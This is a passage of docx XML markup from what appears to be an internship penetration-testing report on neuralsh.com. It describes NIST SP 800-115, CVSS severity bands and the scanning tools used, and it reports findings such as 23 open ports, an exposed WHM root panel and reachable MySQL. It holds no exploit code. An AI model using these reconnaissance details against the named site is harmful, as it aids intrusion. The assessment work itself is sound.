      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>NIST Special Publication 800-115: Technical Guide to Information Security Testing and Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a government-aligned methodology for security testing that emphasizes documentation, risk minimization, and traceability. It organizes security assessment activities into four phases: Planning (defining scope and rules of engagement), Discovery (information gathering and service enumeration), Attack (active exploitation under controlled conditions), and Reporting (documenting findings and recommendations). NIST SP 800-115 was used alongside PTES and OWASP WSTG during this internship to ensure the assessment approach met both academic rigor and industry practice expectations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Common Vulnerability Scoring System (CVSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="1558032"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cvss_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="1558032"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 10: CVSS v3.1 scoring system logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System (CVSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the industry-standard framework for communicating the severity of security vulnerabilities. CVSS v3.1 was used throughout this engagement to assign an objective numeric severity score to each of the 20 findings.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Score Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8B0000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitable remotely with no authentication; maximum business impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Significant risk; exploitable with minimal conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Moderate risk; requires specific conditions or limited impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Minimal direct impact; informational or requires chaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 5: CVSS v3.1 severity bands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The highest CVSS score recorded in this engagement was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for finding N-014 (WHM Root Administration Panel Publicly Exposed). The average CVSS score across all 20 findings was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, placing the overall risk posture at the High-Medium boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 3: RESEARCH METHODOLOGY AND TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>No single approach is sufficient to uncover all vulnerabilities in a modern web application. Automated scanners can rapidly map an attack surface but miss logic flaws and context-dependent weaknesses. Manual testing can identify those deeper issues but is too slow to cover every service and endpoint alone. For this reason, the VAPT engagement on neuralsh.com was conducted using a combination of three complementary approaches: automated scanning, manual testing, and AI-assisted analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Automated Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automated tools were used to perform broad, repeatable scans against the target infrastructure. These tools send structured probes to the target and return results that the assessor then interprets.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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Full TCP port scan on 103.16.xx.xxx — discovered 23 open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Automated web server scan — flagged missing headers, server version disclosure, directory listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Dirb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Directory fuzzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enumerated hidden directories and files on the web application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Template scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Identified known vulnerability patterns across web services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>subfinder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Subdomain enumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Passive subdomain discovery via certificate transparency and public DNS sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>mysql-client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Database connector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Verified MySQL port 3306 accepted unauthenticated connection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 6: Automated testing tools used in this engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="2880000"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="nmap_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>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11: Nmap network scanner logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Network Mapper) is the industry-standard open-source tool for network discovery and service fingerprinting. A full TCP scan with service version detection against the origin server revealed that 103.16.xx.xxx had 23 ports open and reachable from the public internet — including administrative interfaces that should never be exposed. This single scan produced the evidence base for Critical findings N-001, N-002, N-013, and N-014.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="2880000"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="nikto_logo_fixed.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="2880000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 12: Nikto web server scanner logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source web server scanner that checks for thousands of known misconfigurations, outdated software versions, and missing security controls. In this engagement, Nikto was run against both the Cloudflare-protected frontend and directly against the origin IP, contributing to findings N-003 (Missing Security Headers), N-012 (Server Version Disclosure), and N-017 (Directory Listing Enabled).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="853554"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shodan_logo_fixed.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="853554"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
